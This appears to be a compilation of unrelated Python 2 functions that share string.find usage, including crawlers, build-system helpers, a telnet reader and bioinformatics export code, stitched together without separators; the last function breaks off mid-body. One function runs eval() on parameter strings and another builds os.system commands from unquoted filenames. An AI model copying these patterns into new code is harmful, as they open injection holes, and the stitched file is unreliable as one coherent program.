def generate(inputfilename, outputfilename='', dump=0, **flags):
    """Generate a grammar, given an input filename (X.g)
    and an output filename (defaulting to X.py)."""

    if not outputfilename:
        if inputfilename[-2:] == '.g':
            outputfilename = inputfilename[:-2] + '.py'
        else:
            raise Exception("Missing output filename")

    print 'Input Grammar:', inputfilename
    print 'Output File:', outputfilename

    DIVIDER = '\n%%\n'  # This pattern separates the pre/post parsers
    preparser, postparser = None, None  # Code before and after the parser desc

    # Read the entire file
    s = open(inputfilename, 'r').read()

    # See if there's a separation between the pre-parser and parser
    f = find(s, DIVIDER)
    if f >= 0:
        preparser, s = s[:f] + '\n\n', s[f + len(DIVIDER):]

    # See if there's a separation between the parser and post-parser
    f = find(s, DIVIDER)
    if f >= 0:
        s, postparser = s[:f], '\n\n' + s[f + len(DIVIDER):]

    # Create the parser and scanner
    p = ParserDescription(ParserDescriptionScanner(s))
    if not p:
        return

    # Now parse the file
    t = wrap_error_reporter(p, 'Parser')
    if not t:
        return  # Error
    if preparser is not None:
        t.preparser = preparser
    if postparser is not None:
        t.postparser = postparser

    # Check the options
    for f in t.options.keys():
        for opt, _, _ in yapps_options:
            if f == opt:
                break
        else:
            print 'Warning: unrecognized option', f

    # Add command line options to the set
    for f in flags.keys():
        t.options[f] = flags[f]

    # Generate the output
    if dump:
        t.dump_information()
    else:
        t.output = open(outputfilename, 'w')
        t.generate_output()
def test_runability(executable_name):
    "Output a warning message if the generated executable seems unlikely to run."
    if not executable_name or not os.access(executable_name, os.F_OK):
        # Executable doesn't exist (e.g., is "-").
        return
    try:
        dynlib_cmd_tmpl = ncptl_config["DYNLIB_CMD_FMT"]
        dynlib_out = os.popen((dynlib_cmd_tmpl % executable_name)[1:-1])
        oneline = dynlib_out.readline()
        while oneline:
            if string.find(oneline, "ncptl") != -1 and string.find(oneline, "not found") != -1:
                libdir = expanded_ncptl_config["libdir"]
                sys.stderr.write("#\n")
                sys.stderr.write("# WARNING: Don't forget to put %s in your dynamic library search path:\n" % libdir)
                try:
                    ld_library_path = string.join([os.environ["LD_LIBRARY_PATH"], libdir], ":")
                except KeyError:
                    ld_library_path = libdir
                sys.stderr.write("#    [bash] export LD_LIBRARY_PATH=%s\n" % ld_library_path)
                sys.stderr.write("#    [tcsh] setenv LD_LIBRARY_PATH %s\n" % ld_library_path)
                return
            oneline = dynlib_out.readline()
        dynlib_out.close()
    except:
        pass
def displayMessage(self, aMessage):
    """
    in: string or list of string aMessage
    returns nothing
    """
    self.restoreMessageWindow()
    iter = self.theMessageBuffer.get_iter_at_mark(self.endMark)

    # writes string or list of strings to end of buffer
    if type(aMessage) == list:
        # If the first string does not start with '\n', prepend one.
        if len(aMessage) > 0:
            if string.find(aMessage[0], '\n') != 0:
                aMessage[0] = '\n' + aMessage[0]
        # append every line, not just the last one
        for aLine in aMessage:
            aString = str(aLine)
            self.theMessageBuffer.insert(iter, aString, len(aString))
    else:
        aString = str(aMessage)
        if string.find(aString, '\n') != 0:
            aString = '\n' + aString
        self.theMessageBuffer.insert(iter, aString, len(aString))

    # scrolls textwindow to end of buffer
    self['textview1'].scroll_to_mark(self.endMark, 0)
import string

def countSubStringMatch(target, key):
    count = 0
    initialIndex = 0
    while string.find(target, key, initialIndex) != -1:
        count += 1
        # skip past the whole match so the scan always advances
        # (counts non-overlapping occurrences)
        initialIndex = string.find(target, key, initialIndex) + len(key)
    print count
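# Hypothetical sanity check for countSubStringMatch (strings invented here,
# not part of the original exercise): "atgc" occurs twice in the target
# without overlap, so this prints 2.
countSubStringMatch("atgacatgcacaagtatgcat", "atgc")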
def getPage(self, url):
    r = Retrive(url)
    retval = r.download()
    if retval[0] == '*':
        print retval, 'sss'
        return
    Crawler.count += 1
    self.seen.append(url)

    links = r.parseAndGetLinks()
    for eachlink in links:
        if eachlink[:4] != 'http' and find(eachlink, '://') == -1:
            eachlink = urljoin(url, eachlink)
        print '* ', eachlink

        if eachlink not in self.seen:
            if find(eachlink, self.dom) == -1:
                print '  ...discarded, not in domain'
            else:
                if eachlink not in self.q:
                    self.q.append(eachlink)
                    print '  ...new, added to Q'
                else:
                    print '  ...discarded, already in Q'
        else:
            print '  ...discarded, already processed'
import fileinput
import glob
import string
import sys

def replacestrs(filename, s, r):
    files = glob.glob(filename)
    for line in fileinput.input(files, inplace=1):
        # only rewrite lines that actually contain the search string
        if string.find(line, s) != -1:
            line = line.replace(s, r)
        sys.stdout.write(line)
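# Hypothetical invocation (pattern and strings invented): rewrite every *.txt
# file in the current directory in place, replacing "foo" with "bar".
replacestrs('*.txt', 'foo', 'bar')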
def _test_changing_upstream_list(self):
    bus.queryenv_service = qe
    config = bus.config
    sect_name = nginx.CNF_SECTION
    nginx_incl = "/etc/nginx/app-servers.include"
    config.set(sect_name, "app_include_path", nginx_incl)

    custom_include = 'upstream backend {\n\n server 8.8.8.8:80\tweight=5;\n\n server 7.7.7.7:80\tdebug;\n}'
    print custom_include
    with open(nginx_incl, 'w') as fp:
        fp.write(custom_include)

    n = nginx.NginxHandler()
    n._reload_upstream()
    n._reload_upstream()

    new_incl = None
    with open(nginx_incl, 'r') as fp:
        new_incl = fp.read()
    print new_incl

    # queryenv has only 8.8.8.8 in list_roles, so 7.7.7.7 is not supposed to exist
    self.assertRaises(ValueError, string.index, *(new_incl, '7.7.7.7;'))
    # ip_hash wasn't in the original file, so after reconfigure it is not supposed to exist either
    self.assertRaises(ValueError, string.index, *(new_incl, 'ip_hash;'))
    # 8.8.8.8 had the 'weight' option, so it is not supposed to have vanished
    self.assertNotEquals(string.find(new_incl, 'weight=5;'), -1)
    # check that there is only one include
    include_str = 'include /etc/nginx/proxies.include;'
    self.assertNotEquals(string.find(new_incl, include_str), -1)
    self.assertEquals(string.find(new_incl, include_str), string.rfind(new_incl, include_str))
def createCFGFiles(i, orgFile, basename, dir):
    newFile = basename + "_" + str(i) + ".py"
    newFile = os.path.join(dir, newFile)
    print(newFile)
    outFile = open(newFile, 'w')
    for iline in orgFile:
        indx = string.find(iline, INPUTSTARTSWITH)
        if (indx == 0):
            indx2 = string.find(iline, searchInput)
            if (indx2 < 0):
                print("Problem")
                sys.exit(1)
            else:
                iline = string.replace(iline, searchInput, str(i))
        indx = string.find(iline, OUTPUTSTARTSWITH)
        if (indx == 0):
            indx2 = string.find(iline, searchOutput)
            if (indx2 < 0):
                print("Problem")
                sys.exit(1)
            else:
                replString = "_" + str(i) + searchOutput
                iline = string.replace(iline, searchOutput, replString)
        outFile.write(iline + "\n")
    CloseFile(outFile)
    return newFile
def processFlexResLinesV4(self, lines):
    #print "in processFlexResLinesV4: len(self.ligLines=)", len(self.ligLines)
    if self.version != 4.0:
        print "not version 4.0! RETURNING!!"
        return
    ligLINES = []
    foundRun = 0
    ind = 21
    for l in lines:
        # in clustering dlg, multiple copies of input-pdbq are present
        if find(l, 'Run') > -1 and foundRun:
            break
        elif find(l, 'Run') > -1:
            foundRun = 1
        elif find(l, '^_____________________') > -1:
            # last line is ________________-
            break
        else:
            ligLINES.append(l[ind:-1])
    # check here to remove lines of just spaces
    nl = []
    for l in ligLINES:
        if len(strip(l)):
            nl.append(l)
    self.flex_res_lines = nl
    #print "end pFRLV4: len(self.flex_res_lines)=", len(nl)
    #print "end processFlexResLinesV4: len(self.ligLines=)", len(self.ligLines)
    self.hasFlexRes = True
    self.flex_res_count = nl.count("REMARK status: ('A' for Active; 'I' for Inactive)")
def walk_directory(prefix=""):
    views = []
    sections = []
    for dirname, dirnames, filenames in os.walk('.'):
        for filename in filenames:
            filepart, fileExtension = os.path.splitext(filename)
            pos = filepart.find("ViewController")
            if string.lower(fileExtension) == ".xib" and pos > 0:
                # read file contents
                f = open(dirname + "/" + filename, 'r')
                contents = f.read()
                f.close()

                # identify identifier part
                vc_name = prefix_remover(filepart[0:pos], prefix)
                vc_name = special_names(vc_name)

                if string.find(contents, "MCSectionViewController") != -1 or string.find(contents, "SectionViewController") != -1:
                    sections.append({"type": "section",
                                     "variable_name": "SECTION_" + string.upper(vc_name),
                                     "mapped_to": filepart})
                else:
                    views.append({"type": "view",
                                  "variable_name": "VIEW_" + string.upper(vc_name),
                                  "mapped_to": filepart})
    return sections, views
def piped_spawn(sh, escape, cmd, args, env, stdout, stderr):
    # There is no direct way to do that in python. What we do
    # here should work for most cases:
    #   In case stdout (stderr) is not redirected to a file,
    #   we redirect it into a temporary file tmpFileStdout
    #   (tmpFileStderr) and copy the contents of this file
    #   to stdout (stderr) given in the argument
    if not sh:
        sys.stderr.write("scons: Could not find command interpreter, is it in your PATH?\n")
        return 127
    else:
        # one temporary file for stdout and stderr
        tmpFileStdout = os.path.normpath(tempfile.mktemp())
        tmpFileStderr = os.path.normpath(tempfile.mktemp())

        # check if output is redirected
        stdoutRedirected = 0
        stderrRedirected = 0
        for arg in args:
            # are there more possibilities to redirect stdout ?
            if string.find(arg, ">", 0, 1) != -1 or string.find(arg, "1>", 0, 2) != -1:
                stdoutRedirected = 1
            # are there more possibilities to redirect stderr ?
            if string.find(arg, "2>", 0, 2) != -1:
                stderrRedirected = 1

        # redirect output of non-redirected streams to our tempfiles
        if stdoutRedirected == 0:
            args.append(">" + str(tmpFileStdout))
        if stderrRedirected == 0:
            args.append("2>" + str(tmpFileStderr))

        # actually do the spawn
        try:
            args = [sh, "/C", escape(string.join(args))]
            ret = os.spawnve(os.P_WAIT, sh, args, env)
        except OSError, e:
            # catch any error
            try:
                ret = exitvalmap[e[0]]
            except KeyError:
                sys.stderr.write("scons: unknown OSError exception code %d - %s: %s\n" % (e[0], cmd, e[1]))
            if stderr != None:
                stderr.write("scons: %s: %s\n" % (cmd, e[1]))

        # copy child output from tempfiles to our streams
        # and do clean up stuff
        if stdout != None and stdoutRedirected == 0:
            try:
                stdout.write(open(tmpFileStdout, "r").read())
                os.remove(tmpFileStdout)
            except (IOError, OSError):
                pass

        if stderr != None and stderrRedirected == 0:
            try:
                stderr.write(open(tmpFileStderr, "r").read())
                os.remove(tmpFileStderr)
            except (IOError, OSError):
                pass
        return ret
def parseLaTeXFile(fid_tex, fid_html):
    '''Parse LaTeX file'''

    # write html header
    write_html_header(fid_html)

    token = "\\begin{document}"
    this_line_number = 0
    for line in fid_tex.readlines():
        this_line_number += 1

        # search for token
        base_index = string.find(line, token)
        if base_index >= 0:
            print " token '" + token + "' found on line " + str(this_line_number) + " : " + line
            line_sub = line[len(token)+1:len(line)]

            # search for new line
            end_index = string.find(line_sub, "\n")
            if end_index < 0:
                # no "\n" found: assume we should read entire line
                end_index = len(line_sub) - 1

    # write html footer
    write_html_footer(fid_html)
def check_config_h():
    """Check if the current Python installation (specifically, pyconfig.h)
    appears amenable to building extensions with GCC.  Returns a tuple
    (status, details), where 'status' is one of the following constants:
      CONFIG_H_OK
        all is well, go ahead and compile
      CONFIG_H_NOTOK
        doesn't look good
      CONFIG_H_UNCERTAIN
        not sure -- unable to read pyconfig.h
    'details' is a human-readable string explaining the situation.

    Note there are two ways to conclude "OK": either 'sys.version' contains
    the string "GCC" (implying that this Python was built with GCC), or the
    installed "pyconfig.h" contains the string "__GNUC__".
    """
    from distutils import sysconfig
    import string

    if string.find(sys.version, 'GCC') >= 0:
        return (CONFIG_H_OK, "sys.version mentions 'GCC'")

    fn = sysconfig.get_config_h_filename()
    try:
        f = open(fn)
        try:
            s = f.read()
        finally:
            f.close()
    except IOError as exc:
        return (CONFIG_H_UNCERTAIN,
                "couldn't read '%s': %s" % (fn, exc.strerror))

    if string.find(s, '__GNUC__') >= 0:
        return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn)
    else:
        return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn)
def read_until(self, match, timeout=None):
    """Read until a given string is encountered or until timeout.

    When no match is found, return whatever is available instead,
    possibly the empty string.  Raise EOFError if the connection
    is closed and no cooked data is available.

    """
    n = len(match)
    self.process_rawq()
    i = string.find(self.cookedq, match)
    if i >= 0:
        i = i + n
        buf = self.cookedq[:i]
        self.cookedq = self.cookedq[i:]
        return buf
    s_reply = ([self], [], [])
    s_args = s_reply
    if timeout is not None:
        s_args = s_args + (timeout,)
    while not self.eof and apply(select.select, s_args) == s_reply:
        i = max(0, len(self.cookedq) - n)
        self.fill_rawq()
        self.process_rawq()
        i = string.find(self.cookedq, match, i)
        if i >= 0:
            i = i + n
            buf = self.cookedq[:i]
            self.cookedq = self.cookedq[i:]
            return buf
    return self.read_very_lazy()
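# A hypothetical use of read_until via the stdlib Telnet class this method
# comes from (host and prompt invented for illustration); it returns whatever
# arrived, whether or not the match was found before the timeout:
# tn = telnetlib.Telnet('localhost')
# banner = tn.read_until('login: ', 10)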
def _load_resource_from_path(app_root, service_name, conf, event_no):
    queue_name = conf['SQS_QUEUE']
    mock_root = app_root + '/../mock'
    std_root = mock_root
    if 'MOCK_ROOT' in conf and conf['MOCK_ROOT'] is not None:
        mock_root = conf['MOCK_ROOT']
    root = mock_root
    fname = 'event'
    fpath = '/' + service_name + '/' + queue_name + '/' + fname + '.' + str(event_no)
    try:
        file_path = convert_to_platform_safe(root + fpath)
        logger.info('mock file: ' + file_path)
        handle = open(file_path)
    except IOError:
        if std_root is not mock_root:
            try:
                file_path = convert_to_platform_safe(std_root + fpath)
                logger.info('mock file: ' + file_path)
                handle = open(file_path)
            except IOError:
                return
    data = handle.read()
    cut = string.find(data, 'MOCKDATA-MOCKDATA-MOCKDATA')
    if cut >= 0:
        data = data[string.find(data, '\n', cut)+1:]
    response = json.loads(data)
    return response
def __init__(self, numerator, denominator=1, carrier=0):
    """Constructor"""
    if numerator == None:
        self.numerator, self.denominator, self.rawnum, self.rawden, self.rawcar = None, None, None, None, None
    else:
        self.rawnum, self.rawden, self.rawcar = numerator, denominator, carrier
        if isinstance(numerator, float):
            from string import find
            numeratorStg = str(numerator)
            chkCarrier = lambda car: int((car, '0')[car == ''])
            chkSign = lambda sig: (1, -1)[sig < 0]
            carrier = chkCarrier(numeratorStg[0:find(numeratorStg, ".")])
            numeratorStg = numeratorStg[find(numeratorStg, ".")+1:len(numeratorStg)]
            numerator = int(numeratorStg) * chkSign(numerator)
            denominator = 10 ** len(numeratorStg)
        try:
            numerator += carrier * denominator
        except TypeError:
            numerator = None
        g = gcd(numerator, denominator)
        if g != None:
            self.numerator = numerator / g
            self.denominator = denominator / g
        else:
            self.numerator, self.denominator, self.rawnum, self.rawden, self.rawcar = None, None, None, None, None
def getPage(self, url):
    r = Retriever(url)
    retval = r.download()
    if retval[0] == '*':  # error situation, do not parse
        print retval, '... skipping parse'
        return
    Crawler.count = Crawler.count + 1
    print '\n(', Crawler.count, ')'
    print 'URL:', url
    print 'FILE:', retval[0]
    self.seen.append(url)

    links = r.parseAndGetLinks()  # get and process links
    for eachLink in links:
        if eachLink[:4] != 'http' and \
                find(eachLink, '://') == -1:
            eachLink = urljoin(url, eachLink)
        print '* ', eachLink,

        if find(lower(eachLink), 'mailto:') != -1:
            print '... discarded, mailto link'
            continue

        if eachLink not in self.seen:
            if find(eachLink, self.dom) == -1:
                print '... discarded, not in domain'
            else:
                if eachLink not in self.q:
                    self.q.append(eachLink)
                    print '... new, added to Q'
                else:
                    print '... discarded, already in Q'
        else:
            print '... discarded, already processed'
def write(self, vars):
    """Merge ncdf.F90.in with definitions."""
    numvars = 0
    for v in vars:
        if vars[v]['dimensions'] != v:
            numvars = numvars + 1
    self.thisvar = 1

    self.print_warning()
    for l in self.infile.readlines():
        for k in module.keys():
            l = l.replace(k.upper(), module[k])
        for token in self.handletoken:
            if string.find(l, token) != -1:
                break
        if string.find(l, token) != -1:
            for v in vars.keys():
                self.handletoken[token](vars[v])
        elif '!GENVAR_HOT!' in l:
            self.print_varhot()
        elif '!GENVAR_DIMS!' in l:
            self.print_dimensions()
        elif '!GENVAR_CHECKDIM!' in l:
            self.print_checkdims()
        else:
            self.stream.write("%s" % l)
    self.infile.close()
    self.stream.close()
def extract(self, string, start_marker, end_marker):
    """wrapper function for slicing into a string"""
    start_loc = string.find(start_marker)
    end_loc = string.find(end_marker)
    if start_loc == -1 or end_loc == -1:
        return ""
    return string[start_loc+len(start_marker):end_loc]
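# Hypothetical usage (markers invented). Note that "string" here is the str
# argument itself, shadowing the string module, so str.find() is what runs:
#   self.extract("id=42;", "id=", ";")  ->  "42"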
def platform_default():
    """Return the platform string for our execution environment.

    The returned value should map to one of the SCons/Platform/*.py
    files.  Since we're architecture independent, though, we don't
    care about the machine architecture.
    """
    osname = os.name
    if osname == 'java':
        osname = os._osType
    if osname == 'posix':
        if sys.platform == 'cygwin':
            return 'cygwin'
        elif string.find(sys.platform, 'irix') != -1:
            return 'irix'
        elif string.find(sys.platform, 'sunos') != -1:
            return 'sunos'
        elif string.find(sys.platform, 'hp-ux') != -1:
            return 'hpux'
        elif string.find(sys.platform, 'aix') != -1:
            return 'aix'
        elif string.find(sys.platform, 'darwin') != -1:
            return 'darwin'
        else:
            return 'posix'
    elif os.name == 'os2':
        return 'os2'
    else:
        return sys.platform
def get_field_max(proc, time, fieldName):
    """
    Unzip and read the data from all the specified fields in a given folder
    """
    time_path = os.path.join(proc, time)
    if os.path.isdir(time_path):
        filePath = os.path.join(time_path, fieldName + '.gz')
        fz = gzip.open(filePath, 'rb')
        content = fz.read()
        fz.close()
        loc1 = string.find(content, 'internalField')
        chop1 = content[loc1:]
        loc2 = string.find(chop1, ';')
        chop2 = chop1[13:loc2]
        if "nonuniform" not in chop2:
            maxVal = float(string.split(chop2)[1])
        else:
            lines = chop2.split('\n')
            lines = lines[3:-2]
            maxVal = max([float(x) for x in lines])
        return maxVal
    else:
        return None
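# Hypothetical call (decomposed-case paths invented): read the gzipped "p"
# field written by processor0 at time "0.1" and return the maximum of its
# internalField values.
# get_field_max('processor0', '0.1', 'p')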
def platform_default():
    """Return the platform string for our execution environment.

    The returned value should map to one of the SCons/Platform/*.py
    files.  Since we're architecture independent, though, we don't
    care about the machine architecture.
    """
    osname = os.name
    if osname == "java":
        osname = os._osType
    if osname == "posix":
        if sys.platform == "cygwin":
            return "cygwin"
        elif string.find(sys.platform, "irix") != -1:
            return "irix"
        elif string.find(sys.platform, "sunos") != -1:
            return "sunos"
        elif string.find(sys.platform, "hp-ux") != -1:
            return "hpux"
        elif string.find(sys.platform, "aix") != -1:
            return "aix"
        elif string.find(sys.platform, "darwin") != -1:
            return "darwin"
        else:
            return "posix"
    elif os.name == "os2":
        return "os2"
    else:
        return sys.platform
def strToEventList(str_in):
    events_idx = string.find(str_in, 'Events')        # -1 if not found
    start_idx = string.find(str_in, '[', events_idx)  # -1 if not found
    psn = start_idx + 1
    square_count = 1
    curly_count = 0
    events_str_array = []
    while square_count > 0 and psn < len(str_in):
        cur = str_in[psn]
        #if args.verbose:
        #    print (psn, cur, square_count, curly_count, len(events_str_array))
        if cur == '[':
            square_count += 1
        elif cur == ']':
            square_count -= 1
        elif cur == '{':
            if curly_count == 0:
                begin_psn = psn
            curly_count += 1
        elif cur == '}':
            if curly_count == 1:
                events_str_array.append(str_in[begin_psn:psn+1])
            curly_count -= 1
        psn += 1
    return events_str_array
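# Hypothetical sanity check (input string invented): extracts each top-level
# {...} object inside the Events [...] block, so this prints
# ['{"a": 1}', '{"b": 2}'].
print strToEventList('Events [ {"a": 1}, {"b": 2} ]')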
def find_tv_show_season(content, tvshow, season):
    url_found = None
    possible_matches = []
    all_tvshows = []
    h = HTMLParser.HTMLParser()

    for matches in re.finditer(movie_season_pattern, content, re.IGNORECASE | re.DOTALL):
        found_title = matches.group('title')
        found_title = h.unescape(found_title)
        log(__name__, "Found tv show season on search page: %s" % found_title)
        s = difflib.SequenceMatcher(None, string.lower(found_title + ' ' + matches.group('year')), string.lower(tvshow))
        all_tvshows.append(matches.groups() + (s.ratio() * int(matches.group('numsubtitles')),))
        if string.find(string.lower(found_title), string.lower(tvshow) + " ") > -1:
            if string.find(string.lower(found_title), string.lower(season)) > -1:
                log(__name__, "Matching tv show season found on search page: %s" % found_title)
                possible_matches.append(matches.groups())

    if len(possible_matches) > 0:
        possible_matches = sorted(possible_matches, key=lambda x: -int(x[3]))
        url_found = possible_matches[0][0]
        log(__name__, "Selecting matching tv show with most subtitles: %s (%s)" % (
            possible_matches[0][1], possible_matches[0][3]))
    else:
        if len(all_tvshows) > 0:
            all_tvshows = sorted(all_tvshows, key=lambda x: -int(x[4]))
            url_found = all_tvshows[0][0]
            log(__name__, "Selecting tv show with highest fuzzy string score: %s (score: %s subtitles: %s)" % (
                all_tvshows[0][1], all_tvshows[0][4], all_tvshows[0][3]))

    return url_found
def shortcreateurls(input):
    curloc = 0
    while curloc != -1:
        curloc = string.find(input, "http://", curloc)
        if -1 != curloc:
            maxend = string.find(input, " ", curloc)
            if maxend == -1:
                maxend = len(input)
            length = maxend - curloc
            # trim trailing punctuation off the URL
            a = input[curloc+length-1]
            while a == '.' or a == ']' or a == ')' or a == ',' or a == ';':
                length -= 1
                a = input[curloc+length-1]
            firstslash = curloc + 7
            while firstslash < len(input) and input[firstslash] != "/" and firstslash < curloc+length:
                firstslash += 1
            output = '(' + input[curloc+7:firstslash] + ") " + '<a class="saxgray" href="'
            output = output + input[curloc:curloc+length] + '" target="_blank">[Link]</a>'
            print(output)
            newlen = len(output)
            if curloc > 0:
                output = input[0:curloc-1] + output
            if curloc + length < len(input):
                output = output + input[curloc+length:-1]
            input = output
            curloc = curloc + newlen
    return shorturls(input, 0)
def query_info_Request_Structure(Query_info, fileId, *query_info_params):
    infotypefound = 0
    fileinfoclassfound = 0
    cnt = 0
    while (cnt < len(query_info_params)):
        tmpstr = query_info_params[cnt]
        tmpstr = tmpstr.strip()
        tmpstr = tmpstr.lower()
        if (string.find(tmpstr, 'infotype') != -1):
            tmpstr = (tmpstr[(string.find(tmpstr, '=')+1):]).strip()
            infotype = eval(tmpstr)
            infotypefound = 1
        elif (string.find(tmpstr, 'fileinfoclass') != -1):
            tmpstr = (tmpstr[(string.find(tmpstr, '=')+1):]).strip()
            fileinfoclass = eval(tmpstr)
            fileinfoclassfound = 1
            #print fileinfoclass
        cnt += 1
    if (infotypefound == 0):
        infotype = 0x0
    if (fileinfoclassfound == 0):
        fileinfoclass = 0x0
    Query_info1 = query_info_Extend_Request_Structure(Query_info, fileId, infotype, fileinfoclass)
    return Query_info1
def getspec(infile, region='relpix,box(-2,-2,0,0)', vsource=5., hann=5, tmpfile="junk"):
    '''dump out spectrum of selected region with imspec, return [chan, freqLSR, flux] arrays'''

    # step 1: use imlist to retrieve velocity and freq information from the header
    p = subprocess.Popen((shlex.split('imlist in=%s' % infile)),
                         stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
    result = p.communicate()[0]
    lines = result.split("\n")
    for line in lines:
        if len(line) > 1:
            a = line.split()
            n = string.find(line, "restfreq:")
            if n >= 0:
                restfreq = float(line[n+9:].split()[0])
            n = string.find(line, "crval3  :")
            if n >= 0:
                v1 = float(line[n+9:].split()[0])
            n = string.find(line, "cdelt3  :")
            if n >= 0:
                dv = float(line[n+9:].split()[0])
    print "restfreq = %.5f GHz; v1 = %.3f km/sec; dv = %.3f km/sec" % (restfreq, v1, dv)

    # step 2: use imspec to dump out the spectrum for the selected region to tmpfile
    chan = []
    freq = []
    flux = []
    p = subprocess.Popen((shlex.split("imspec in=%s region=%s options=list,eformat,noheader,hanning,%d log=%s" %
                                      (infile, region, hann, tmpfile))),
                         stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
    time.sleep(1)
    result = p.communicate()[0]
    print result
    if "Fatal Error" in result:
        print " --- fatal --- "
        return

    # step 3: read velocities and flux densities from tmpfile, create arrays
    fin = open(tmpfile, "r")
    for line in fin:
        a = line.split()
        if len(a) > 2:
            chan.append(int(a[0]))
            nchan = int(a[0])
            vlsr = float(a[1])
            flux.append(float(a[2]))
            vlsrcalc = v1 + (nchan - 1) * dv
            if abs(vlsrcalc - vlsr) > 0.05:
                print "WARNING: channel %d listed vlsr = %.2f, calculated = %.2f" % (nchan, vlsr, vlsrcalc)
            fqLSR = restfreq * (1. - vlsrcalc/clight)
            freq.append(fqLSR/(1. - vsource/clight))
            #print nchan, vlsrcalc, fqLSR, freq[-1]
            # freq in rest frame of source
    fin.close()
    print "read in %d lines" % len(freq)

    # step 4: sort in frequency order, return arrays
    # this sorts the chan,freq,flux triplets in freq order
    spectrum = numpy.array(sorted(zip(freq, chan, flux)))
    # this returns separate freq and flux arrays
    a, b, c = numpy.split(spectrum, 3, axis=1)
    return numpy.reshape(b, len(a)), numpy.reshape(a, len(b)), numpy.reshape(c, len(c))
def walking(skip, dirname, names):
    print
    if dirname in skip:
        print 'skipping', dirname
    else:
        print 'working in', dirname
        for name in names:
            if dirname != os.curdir:
                filename = os.path.join(dirname, name)
            else:
                filename = name
            if os.path.isfile(filename) == 1:
                if string.find(filename, ".htm") != -1 \
                        or string.find(filename, ".shtm") != -1:
                    print 'file:', filename, ' ---- ',
                    # fix and validate xhtml
                    print 'Tidy,'
                    os.system('tidy -q -m ' + filename)
                    # to be added: linbot link check
                    # to be added: bobby accessibility check
                elif string.find(filename, ".css") != -1:
                    # w3c css validator
                    classpath = ' E:\\lib\\validator.zip org.w3c.css.css.StyleSheetCom '
                    os.system('java -classpath' + classpath + filename)
                else:
                    print 'file:', filename, ' ---- ',
                    print 'no processing'
import string

def subStringMatchExact(target, key):
    startingList = []
    initialIndex = 0
    while string.find(target, key, initialIndex) != -1:
        startingList.append(string.find(target, key, initialIndex))
        # skip past the whole match so the scan always advances
        # (collects non-overlapping occurrences)
        initialIndex = string.find(target, key, initialIndex) + len(key)
    print tuple(startingList)
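# Hypothetical sanity check (strings invented, not from the original
# exercise): "atgc" starts at indices 5 and 15 here, so this prints (5, 15).
subStringMatchExact("atgacatgcacaagtatgcat", "atgc")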
def allinstances(string, letter):
    listindex = []
    i = string.find(letter, 1)  # 1 is because there is a space added before word. don't know what that does
    while i >= 0:
        listindex.append(i)
        i = string.find(letter, i + 1)
    return listindex
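# Hypothetical usage (argument invented): the parameter named "string" is the
# text itself (it shadows the string module, so str.find() is what runs);
# this prints [2, 4, 6] -- every index of 'a' from position 1 onward.
print allinstances(" banana", "a")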
def exportAltMouseExonSequence():
    probeset_exon_db = {}
    x = 0
    species = 'Mm'
    array_type = 'AltMouse'

    critical_exon_import_file = 'AltDatabase/Mm/AltMouse/AltMouse_junction-comparisons.txt'
    update.verifyFile(critical_exon_import_file, array_type)
    critical_exon_db = {}
    critical_probesets = {}
    fn = filepath(critical_exon_import_file)
    for line in open(fn, 'rU').xreadlines():
        data = cleanUpLine(line)
        gene, probeset1, probeset2, critical_exons = string.split(data, '\t')
        critical_exons = string.split(critical_exons, '|')
        for exon in critical_exons:
            try:
                critical_exon_db[gene, exon].append(probeset1 + '-' + probeset2)
            except KeyError:
                critical_exon_db[gene, exon] = [probeset1 + '-' + probeset2]
        critical_probesets[probeset1] = []
        critical_probesets[probeset2] = []

    probeset_annotations_file = "AltDatabase/Mm/AltMouse/MASTER-probeset-transcript.txt"
    update.verifyFile(probeset_annotations_file, array_type)
    fn = filepath(probeset_annotations_file)
    for line in open(fn, 'rU').xreadlines():
        probeset_data = cleanUpLine(line)  # remove endline
        if x == 0:
            x = 1
        else:
            probeset, affygene, exons, transcript_num, transcripts, probe_type_call, ensembl, block_exon_ids, block_structure, comparison_info = string.split(probeset_data, '\t')
            if probeset in critical_probesets:
                exons = exons[:-1]
                exons = string.split(exons, '-')
                affygene = affygene[:-1]
                if '|' in exons:
                    print exons; kill
                probeset_exon_db[probeset, affygene] = exons

    exon_protein_sequence_file = "AltDatabase/Mm/AltMouse/SEQUENCE-transcript-dbase.txt"
    update.verifyFile(exon_protein_sequence_file, array_type)
    transcript_cdna_sequence_dbase, transcript_associations, exon_sequence_database = import_existing_sequence_build(exon_protein_sequence_file)

    critical_exon_seq_export = 'AltDatabase/Mm/AltMouse/AltMouse_critical-exon-seq.txt'
    update.verifyFile(critical_exon_seq_export, array_type)
    fn = filepath(critical_exon_seq_export)
    data = open(fn, 'w')
    title = ['Affygene:exon', 'critical_exon-num', 'critical-probeset-comps']
    title = string.join(title, '\t') + '\n'
    data.write(title)
    for (gene, exon_num) in critical_exon_db:
        probeset_comp_list = critical_exon_db[(gene, exon_num)]
        probeset_comp_list = string.join(probeset_comp_list, '|')
        try:
            ### Restrict export to previously exported critical exons (ExonAnnotate_module)
            exon_sequence_database[(gene, exon_num)]
            esd = exon_sequence_database[(gene, exon_num)]
            exon_seq = esd.ExonSeq()
            exon_data = string.join([gene + ':' + exon_num, probeset_comp_list, exon_seq], '\t') + '\n'
            data.write(exon_data)
        except KeyError:
            null = []
    data.close()

    probeset_seq_file = 'AltDatabase/Mm/AltMouse/probeset_sequence_reversed.txt'
    update.verifyFile(probeset_seq_file, array_type)
    probeset_seq_db = {}
    x = 0
    fn = filepath(probeset_seq_file)
    for line in open(fn, 'rU').xreadlines():
        if x == 0:
            x = 1
        else:
            data = cleanUpLine(line)
            t = string.split(data, '\t')
            probeset = t[0]
            probeset_seq_list = t[1:]
            probeset_seq_db[probeset] = probeset_seq_list

    critical_junction_seq_export = 'AltDatabase/Mm/AltMouse/AltMouse_critical-junction-seq.txt'
    update.verifyFile(critical_junction_seq_export, array_type)
    fn = filepath(critical_junction_seq_export)
    data = open(fn, 'w')
    x = 0
    k = 0
    l = 0
    title = ['probeset', 'probeset-seq', 'junction-seq']
    title = string.join(title, '\t') + '\n'
    data.write(title)
    for (probeset, gene) in probeset_exon_db:
        junction_seq = []
        y = 0
        positions = []
        try:
            probeset_seq_list = probeset_seq_db[probeset]
            for exon_num in probeset_exon_db[(probeset, gene)]:
                try:
                    ### Restrict export to previously exported critical exons (ExonAnnotate_module)
                    exon_sequence_database[(gene, exon_num)]
